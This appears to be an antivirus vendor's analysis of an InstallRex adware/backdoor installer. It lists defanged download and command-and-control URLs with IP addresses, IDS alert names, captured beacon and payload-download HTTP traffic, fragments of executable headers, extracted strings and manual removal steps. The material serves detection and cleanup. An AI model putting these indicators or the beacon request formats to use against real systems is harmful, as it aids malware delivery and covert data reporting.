hxxp://loversion.com/?step_id=1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A
hxxp://loverse.org/addons/dfndr/180/tpq.exe
hxxp://datadownloadscan.info/get/?data=0qEmlGXV14eT8SUlhaxId1vsG2dXdorGpXBeDQJOajuyDnzIxjEy2V7SEf1foQn5e7TlsNfZTgZWiIl8DcvcB6VDjxa7oYbC0hIei8p0z0WZcClBYHI/BxhHt+5+lXeWZE7zZsA/fjFhClZQNJ1W1nJG6bHGac5TbbjsnF9r+oz/2LhANHCCfHCry68+ru2LwKCJPp2Z72FMx0Ov4g2pd583NuYI+xy/2XE+9M6k9Rec3n96zEsGlh4s2ZThK0ROWYiSU0DeHRdQkrKLboNMF8TRginUJU4huNMepqsGNZTXEm2dJ5F9XJum78p6DVHi0ACLiKhDcrM49itcJtuR0aus79gUQq2VVmhWs2qrhbNXvVTD4PWi9SS5fJyPtzd4JpSAUMnOLncRLuS1igA72J9XVDxlxFhJHs5QDohPbLD8SbBeEVD/HhaXGA5ohMHbnVuCXzFtn7cb2g6sQKLGY1q0cDgSXRd40sQbMDKFvWiNkygo+HtIcvP0PWnVmqwfDNZU9JyhtrHw&version=4 54.68.219.215
hxxp://loversion.com/?step_id=1_1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A
hxxp://loverse.org/addons/agup.exe
hxxp://r1.loversion.com/?report_version=5& 54.68.226.215
hxxp://c1.loversion.com/?step_id=1_1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A 54.68.226.215
hxxp://c1.loversion.com/?step_id=1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A 54.68.226.215
hxxp://i1.loverse.org/addons/agup.exe 198.7.61.118
hxxp://i1.loverse.org/addons/dfndr/180/tpq.exe 198.7.61.118


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
ET MALWARE W32/InstallRex.Adware Report CnC Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /get/?data=0qEmlGXV14eT8SUlhaxId1vsG2dXdorGpXBeDQJOajuyDnzIxjEy2V7SEf1foQn5e7TlsNfZTgZWiIl8DcvcB6VDjxa7oYbC0hIei8p0z0WZcClBYHI/BxhHt+5+lXeWZE7zZsA/fjFhClZQNJ1W1nJG6bHGac5TbbjsnF9r+oz/2LhANHCCfHCry68+ru2LwKCJPp2Z72FMx0Ov4g2pd583NuYI+xy/2XE+9M6k9Rec3n96zEsGlh4s2ZThK0ROWYiSU0DeHRdQkrKLboNMF8TRginUJU4huNMepqsGNZTXEm2dJ5F9XJum78p6DVHi0ACLiKhDcrM49itcJtuR0aus79gUQq2VVmhWs2qrhbNXvVTD4PWi9SS5fJyPtzd4JpSAUMnOLncRLuS1igA72J9XVDxlxFhJHs5QDohPbLD8SbBeEVD/HhaXGA5ohMHbnVuCXzFtn7cb2g6sQKLGY1q0cDgSXRd40sQbMDKFvWiNkygo+HtIcvP0PWnVmqwfDNZU9JyhtrHw&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: datadownloadscan.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Thu, 02 Oct 2014 00:37:50 GMT
Content-Length: 0
Connection: close



GET /?step_id=1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name=                Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.loversion.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Oct 2014 00:37:37 GMT
Content-Type: text/html
Content-Length: 9098
Connection: close
Content-Disposition: attachment; filename="1.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".1.4.f.
2.d.9.5.b.-.1.7.9.0.-.4.1.6.c.-.8.0.5.6.-.e.5.2.0.a.4.5.3.e.1.b.1."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".0."...I.n.s.t.a.l.l.e.r.I.D.=.
".1.8.1.4.4.5.0.7.9.1.0.7.9.1.9.5.3.8.9."...L.o.c.a.l.e.=.".<.L.a.n
.g.u.a.g.e.>."...D.a.t.e.=.".2.0.1.4./.1.0./.0.2."...T.i.m.e.=.".0.
:.3.7.:.3.7."...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.
n.s.=.".0."...R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.
r.t.e.d.=."."...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.
d.R.e.p.o.r.t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.
S.e.r.v.e.r.]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.
I.n.f.o.]...C.o.u.n.t.r.y.C.o.d.e.=.".I.N."...I.P.A.d.d.r.e.s.s.=.".1.
9.3...1.3.8...2.4.4...2.3.1."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.
d.G.e.n.]...P.e.r.c.e.n.t.a.g.e.=.".6.8.".....[.S.c.r.e.e.n.7.5.]...T.
i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.
".N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.c.r.e.e.n.
7.6.]...T.i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.
n."...B.u.t.t.o.n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.
o.r.r.y.:. .t.h.e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e.
 .b.r.o.k.e.n... .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .
h.o.m.e.p.a.g.e. .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n...
<<< skipped >>>


GET /addons/agup.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.loverse.org


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Thu, 02 Oct 2014 00:37:35 GMT
Content-Type: application/octet-stream
Content-Length: 773632
Last-Modified: Wed, 17 Sep 2014 09:31:05 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......p.).4.G.4.G.
4.G.R!..7.G.=...5.G.....z.G...../.G.......G.=...1.G.=...%.G.4.F...G.R!
..'.G.4.G.6.G.R!..5.G.R!..5.G.Rich4.G.........................PE..L...
.8.T..................................................................
...P......|m...............................................@..<....
........................................................k..@..........
.....$............................text............................... 
..`.rdata..............................@[email protected]...._.................
[email protected]...<....@......................@..@..............
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U...}..u.3.]..u.....
.Y].U...u......Y].U....\SVW.U....E..H..M..H8.M..H<[email protected]
..H....H..p K.].3.C.....M..H.K.e...M..H(.]..X0.M..H$.P4.M..H,.]..X..x.
.U..M..].#M..E.......M....P......s............C.].........;...........
... .......}...M...l...f..Q.].u..}..t3.M......DE..M.j...T...E.#E.Y*M..
..M.....i........]..M....sm...j.X.B. ..M.3.A............s..E..........
...E.........;.s........ ......f..... . ...... .f...A......r.......].;
]..U...#E. E..B..................... ..M.3..U.A...]...#]..].....U.
<<< skipped >>>


POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r1.loversion.com
Content-Length: 1781
Cache-Control: no-cache

data=GKEmlLFmH+z0R/UAztMQSIY1pCQv13e4EQyV/ZcBH5ajeRrOg1vV6mpGKS7rCrZdjI+v5zfQNJPXFqtxv/QG9S+htNvBeB1W/OOBbRMPmmQ1e4Tr6WZ1kwktYiSNqAGk5bzgVs6EhDtXnmhnf8pFQAQ3HET2K0gZ2+vi5hZIjEvdYFNPXnyVZ3gljGzLVAZYp7gdsoSgK1Cq3n3yAJjqODDROzJBesyo8ykcy/mr2y9f+8U8eFM/S+bhqmzrsCbYjNQk/T91YRl5L2tp432Es+91ZdfLOwVNz44OykwYeudDyLPjQHtFOyrU4xzLdAyJYyfwg/TptDaBEEFrWLHgl74KgQPhGtGA1VJvOCeOTnCWqwvPPt/iu4cB/qlW9/mRWRaxPCp27zT7dt99Mp0NF1jkwMJsvqdiPjiXCQUXjnycQv0OYn/oDqTeV2S4JTMcB6UuzPcpaoL1AOMp6t4W36ei0pDJlzXMInk2ZeLI5/cYCavRbE+HjVa9/glii8AgaGFRx1g2V5WLZuwLQvGGmJRMqxbF2a5+fzt73sxtF4h/FZw6RfqCGV2Qxsf5ix4F7j5gkUX0lYzbvapFukCfejTiGQKAi9f+3m4t4q6ADQBpA1rFyez7TwmXsf9KxEqnE+cAs6A4aIFfC1GswZuoQ+DCpDj3Sq9F9XgLBHmBnvtkwmdsBE4XDIIT6D2hwKOjVk56EbKdef&info=JM3ZVJIECfEiRWpysuXRmDJcu/oyvMxSLYeYscj7MJVuYOIm8hVE6gxSNhr5IorXpATRdS7u19A2P1Kq514VyhnR6/gGnFbUfSh9kJgGW43/6mAeyZrze2gYwuQK41ZQFeDOQi5cK+WHh6bgGTBWT53ffaYXXHT0uWZBNR7ctoLC6IT1TJdMyv+TcTxmlwVWMxIxWnjhOPJI9F2n+Pq8K8eUg/Y9r6DAQE4uG8+9++dehVwXCEuHMgCn8A7s5PYz2dQdhNFlEqrQXVhASr5Qu+vLqczJqyVwdJUQuAGqa4XyIzI7RpCs2FNXEzfoyemrClt8VpScE8LAwQONyShlQI1jM3n8JchyoyRmIm3x4XNIphkp6ZjKUSDn/DZxPh68Emh3a87cicXSC9kI4SptfvmKdqqKe/KjWBJW6YikoICPUo6Kl8IzLpJ3xzBu2xnKqaNO1TYtE1S0yvcHHMhn7wSSjNYfKmCrl3/koaEK2zTJ86ybfFjjEmRDdl8hgj7P+a0APXNOZw7rN6J4Qbq4FBGK7jzgWpoUPD4CeZHFpdAKpsfEiFb0vBwRhIfpGfQgSlA7n
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Oct 2014 00:37:37 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=1_1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name=                Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.loversion.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Oct 2014 00:37:58 GMT
Content-Type: text/html
Content-Length: 6726
Connection: close
Content-Disposition: attachment; filename="1_1.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".e.7.4.
3.0.d.e.0.-.9.f.4.0.-.4.d.7.6.-.a.b.0.8.-.4.0.2.b.c.5.2.3.b.f.2.a."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".0."...I.n.s.t.a.l.l.e.r.I.D.=.
".1.8.1.4.4.5.0.7.9.1.0.7.9.1.9.5.3.8.9."...L.o.c.a.l.e.=.".<.L.a.n
.g.u.a.g.e.>."...D.a.t.e.=.".2.0.1.4./.1.0./.0.2."...T.i.m.e.=.".0.
:.3.7.:.5.8."...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.
n.s.=.".0."...R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.
r.t.e.d.=."."...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.
d.R.e.p.o.r.t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.
S.e.r.v.e.r.]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.
I.n.f.o.]...C.o.u.n.t.r.y.C.o.d.e.=.".I.N."...I.P.A.d.d.r.e.s.s.=.".1.
9.3...1.3.8...2.4.4...2.3.1."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.
d.G.e.n.]...P.e.r.c.e.n.t.a.g.e.=.".3.2.".....[.S.c.r.e.e.n.7.6.]...T.
i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.
t.t.o.n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:.
 .t.h.e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.
e.n... .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.
a.g.e. .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.
e.n.7.5.]...T.i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.
u.t.t.o.n.2.=.".N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?.
<<< skipped >>>


GET /addons/dfndr/180/tpq.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.loverse.org


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Thu, 02 Oct 2014 00:37:14 GMT
Content-Type: application/octet-stream
Content-Length: 4983808
Last-Modified: Wed, 30 Jul 2014 11:39:26 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........U...U...
[email protected].....\...P...U.......U...T....L\.X....LF.T....L
C.T...RichU...................PE..L......R.....................0D.....
[email protected]...@...............
...................3..<.......0.A..................pK..E...........
...........................@..........................................
..text............................... ..`.rdata..t-...................
.......@[email protected]... [email protected][email protected]
.................@[email protected]......,[email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E......E......E.
[email protected].;E.s..E..E....3E..E..E.i......E....E...U..].U.....
.}..u..e...r.E..E..E..E..E..E..E..E....E.@@.E..E.@@.E..E.H.E..}..v7.E.
....M....;.t%.E.....M....;.}..M.....E......E..E......e...E...U......M.
.E..M...;.u..P.E..8.t6.E......E..}..u.j..M..H....M.........E....E..E..
M.....j..M.."....M..v....E.....U..Q.M...U......M..E..x..r..E..E..E....
E....E..E..E..E..E.P.M.......E...D!H..E.....U..Q.M..M..O....E....t..u.
.....Y.E.....U..Q.M..M..(.....U..j.h..G.d.....Pd.%......,.M.j..M..
<<< skipped >>>






The Backdoor connects to the servers at the folowing location(s):







rundll32.exe_1252:




.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s

Upd Inst.exe_1788:




.text
`.rdata
@.data
.rsrc
L$HQSShD`
QSSSSSSh
j.Yf;
_tcPVj@
.PjRW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
load x
qI3[0%s
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USERENV.dll
GetCPInfo
zcÁ
[]@%~!#$^&*()_-?|{}=:
/vABmeRfAuIUlkvobQhxXiDGwS02xn6H0U6DZCDHvIATNlPbpqpPOz1QGiLGMhTuXinBPsG7pT5nQKg97KEjbWMXt6UeZQ3NNhWSkbs0PFUOXeu7qBezPy6gssSHDhGJ
1JyR4HrFONIVXjDC3ceRt4KW5E58D1BdAX9AHUEsxBGQrkj2l4p0wTdBiE7AyjeDgvWK9VVq41NX09K0nnoHzGbVXNQNdpxZbKzI7sigiVjIeNRe8 D7f5nzkjv R2ij
DJG8iVLHF5/4R27dp4BElIKbN/KYkRKY7AbogR38oQlq2txqkyi1sKMR3UpmxdJxPe0HZ/DdKh6G/lUlRZH1/xerK5e7xun94PtKXn1pSjcmK1a5DK1XC7msG9iESCW1
4HrFQ J0KEY8b4oBZWCCb9J2PMsVPOlaLQ9moQOQoSEHORL 9OxkswsK3bpiEZ4fOxjain0oLy40kYhnKKs0deJGnSyjex/VA9ibPUrxX7Gs/Ay7bzRJsCrHQSGYORaa
4H5dKFe wAXj6ynku/N94HrFR273xIi0IAGzz55vz8HIL 0 apXImYhvAzmlpZRXSjcmEeDdVg4C 9RaF0sQlNnsjMyL5da53 cNpd0KlFJb22sElQvaM4mT8PvEN057
20120606
:2RP.aN
vcrT"?y
.D@%D~
@%.wQ
PU.xV;E
f.yrf3
iZ.pR
GW%Cw
<-r}?
:sB-.hK
H.gNQB#
.Ae>W
%.av s,
%-K}E
vH.ye
2%x/z
d{|%F
.UHnf(
pmva'.Prg
g5Zy%X
.LGhx
sQln<uYTN
lŒ2s
Ä{d
`D%Cs2
%o.kE
.gifUl
dd%C#
7.ykC(
a*W*%u?F
%U_;p
c:\documents and settings\all users\application data\showappit\upd inst\Upd Inst.exe
?456789:;<=
!"#$%&'()* ,-./0123
'()*#$%&
>?:;<=9876540123,-./
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<!--Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<!--Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
portuguese-brazilian
%s\%s
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
_dlsys->%s is null
ProductSupport
log.txt
AG%d%s
access out of bounds index %d not in 0..%d
UInfoURL
E:%u LookupPrivValue
E:%u AdjustTokenPriv
AdjustTokenPriv() return: %u (0==success)
E:%u OpProcTkn
(lpCmdLine==NULL)
result=%s
E: empty key; ignored
Except 0x%0.8x @0x%0.8x (%.30s) hmod=0xx
E:%d enc
E OpenPT: %x
E EES: %x
PendingFileRenameOperations
PendingFileRenameOperations2
FileRenameOperations
c:\temp\winnie-pooh\piglet-rules.tmp
DeleteFile('%s') OK (not exist)
DeleteFile('%s') E1:%d;E2:%d
DeleteFile('%s') OK (scheduled; immediate E:%d); pending ops found:%d
DeleteFile('%s') OK
'%.256s~': E:%d
C:\Users
C:\Doc
\qmgr.dll
major version %d looks bogus
minor ver %d looks bogus
s-pack %d looks bogus
E:%d creating Runtime; OS-ver=%d
DLL LogPath='%s'
DL%d_%s
E:%d create HTML document; OS-ver=%d, IE-ver=%s
E:%d bind runtime to HTML window; OS-ver=%d, IE-ver=%s
E:%d LoadScr(BOOT)
E:%d LoadScr(JSO)
FROMAGENT_URLMON_IS_PRIMARY
FROMAGENT_NO_FALLBACK_ON_HTTP_ERRORS
E:%x execScript(JSON)
E:%x execScript(BOOTSTRAP)
execScript(BOOTSTRAP) done; m_eExitCode not set, assumed %d (E_SUCCESS=%d)
execScript(BOOTSTRAP) done; EC:{%d,%d}
execScript(BOOTSTRAP): script ended: VT_%d (VT_INT=%d)
worker about to end - calling spRuntime.Release();
%s-%s
Global\%s
E:%d CreateEvent '%s'
/schedule /profile "%s"
E:%d installing task '%.256s~'
E:%d removing task '%.256s~'
SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
E:%d open BITS registry at '%s'
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): Adjusting BITS FGND retries to %d (in registry)
CAgentModule::CheckAndSetBITSRegistry(samWow64Select=%d): BITS FGND retries (in registry) = %d
Refresh enth set to %d sec
%ds[to-wait]-%ds[since-last];keep>0 ==>%ds
Waiting  %ds
"%s" /%s "%s"
E appdaemon.Start '%.256s~'
%d.%d.%d.d
: E:%d open agent key '%.50s>'
E:%d delete module key '%.256s~'
: InitializeSecurityDescriptor failed; Error %u
: SetSecurityDescriptorDacl failed; Error %u
%s\%s\%s
E:%d open agent key'%.256s~'
WriteRegistryProfile E open module key '%.50s>' E:%d
WriteRegistryProfile E create section key '%.50s>' E:%d
WriteRegistryProfile E write section='%.50s>' value='%.50s>'; E:%d
['%.50s>']('%.50s>')<=='%.50s>'; E:%d; %s
: {sec'%.50s>',key'%.50s>'} E val-len %d>%d truncated
['%.256s~']('%.256s~')='%.256s~'; E %d too long, max=%d
E:%d start worker watchdog
CAgentModule::WatchdogThreadMain: Watchdog active. no event; waiting %d sec
.ini.bak
(%s,%s): E:%d open key
E:%d CoCreateInst
E:%d: ITaskSched::NewWItem
SetApplicationName E:%d
E:%d SetParameters
SetWorkingDirectory E:%d
SetAccountInformation E:%d
SetComment E:%d
SetFlags E:%d
CreateTrigger E:%d
SetTrigger E:%d
SetMaxRunTime E:%d
QueryInterface(IPersistFile) E:%d
E:%d save task in scheduler (IPersistFile::Save)
E:%d activate task (ITask::Run)
CoCreateInstance TaskScheduler failed %d
ITaskScheduler::Delete failed %d
E:%d OpSCMan
OpenService failed %d
ChangeServiceConfig failed %d
E:%d GetUserName
: E:%d LoadUserProfile (hTok=0x%x)
E:%d CreateEnvironmentBlock (hTok=0x%x)
"%s" %s
E:0xx CreateProcessAsUser; cannot start '%.256s~'; attempt CreateProcess
E:0xx CreateProcess; cannot start worker
E:0x%x CreateProcess OK but (hProcess==NULL); cannot start worker
: PHY %dmb<%dmb; E start command'%.256s~'
: VIRT %dmb<%dmb; E start command'%.256s~'
E:0x%0x WTSQUserTken
: E:0x%0x DupToken(Impers); continue;
: E:0x%0x DupToken(Ident); continue;
: E:0x%0x GetTokenInfo; continue;
E:0x%0x ImpersLOU
non admin user, os-ver=%d ==> do not execute
E:%d FndNxtFile: source is a folder
DeleteDirectory('%s') OK
DeleteDirectory('%s') E:%d
RemoveFileTree('%s') OK
RemoveFileTree('%s') E:%d
E:%d '%.256s~'->'%.256s~'
E:%d encrypting; cont unencrypted
E:%d Prepare()
ShellExecuteEx
E:%d (info.hInstance=%d)
Notepad.exe
Software\Microsoft\Windows\Current
ddeexec
.aHTML
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ddd
%d.%d.0.%d
URLInfoAbout
URLUpdateInfo
C:\Windows\System32\msiexec.exe
PID%d.TID%d
CEventLogger::LogEventV: vsprintf error %d with pszFormat='%s'
E:%d create memlog
{"entry_counter":"%u","entry_time":"%s","entry_type":"%llu","message":"%.256s"},
file not reported
JScr E:'%.50s>' F:'%.30s>',L:%d
E:NULL desc) (F='%.30s>',L=%d)
JScr: ExitP(%d)
JScr: ExitP(no code=%d)
E:%d data='%.256s~'
E:%d GetDisID'%.256s~'
ver=%d.%d.%d(%s)
os_id=%d.%d.%d sp%d
aid=%s
hid=%s (old crc32=0xx)
timestamp now=0x%s
IPv4_long=%d 0xx
E:%d folder '%s'
killed %d '%.256s~'
E:%d copy to '%.256s~'
E:%d ShellExec '%.256s~''%.256s~'
E:%d CreateProc '%.256s~'
E:%d GetExitCodProc(pid=%d)
E:%d inst to '%.256s~'
/instal E not adm. (OSVer=%d)
/install E not admin. (OSVer=%d) Cannot run
/Install <path> E:%d; continue as worker to report
/inst E not admin. (OSVer=%d)
/install E:%d schedule logon task (OSVer=%d); continue as worker to report
/install OK, but uninstaller(this=0x%x) E:%d.
/install OK. (will be reported by self)
/install E:%d. (is reported by parent)
/schedule E not admin. (OSVer=%d) Cannot run
New Scheduler v%d.%d.%d %s
Scheduler exits C:0x%x
/uninstall requires admin privileges. (OSVer=%d) Cannot run
Disable OK; %d killed
UNINST REPORT STARTS
UNINST REPORT ENDS
New Wker v%d.%d.%d %s
Worker exits C:0x%x
E:0x%x create: '%.256s~'
(%s,%s): OK
(%s,%s): E:%d setting value
E:%d open key '%.256s~'
RegDeleteKeyEx






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    putfu.exe:1100
    usetup.exe:644
    rundll32.exe:1252
    rundll32.exe:1972
    Upd Inst.exe:1788
    Upd Inst.exe:212
    %original file name%.exe:1936
    

    2. 

  2. Delete the original Backdoor file.
    3. 

  3. Delete or disinfect the following files created/modified by the Backdoor:
    

    %Program Files%\Assistant.dll (264574 bytes)
    %Program Files%\AssistantSvc.dll (174 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
    %Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe (26080 bytes)
    %WinDir%\Tasks\Upd Inst-S-3301306948.job (648 bytes)
    %Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\3301306948.ini (36300 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].txt (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (25824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\TsuDll.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86\regsvr32.exe (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TsuE7C96BC7.dll (2569 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.dat (16944 bytes)
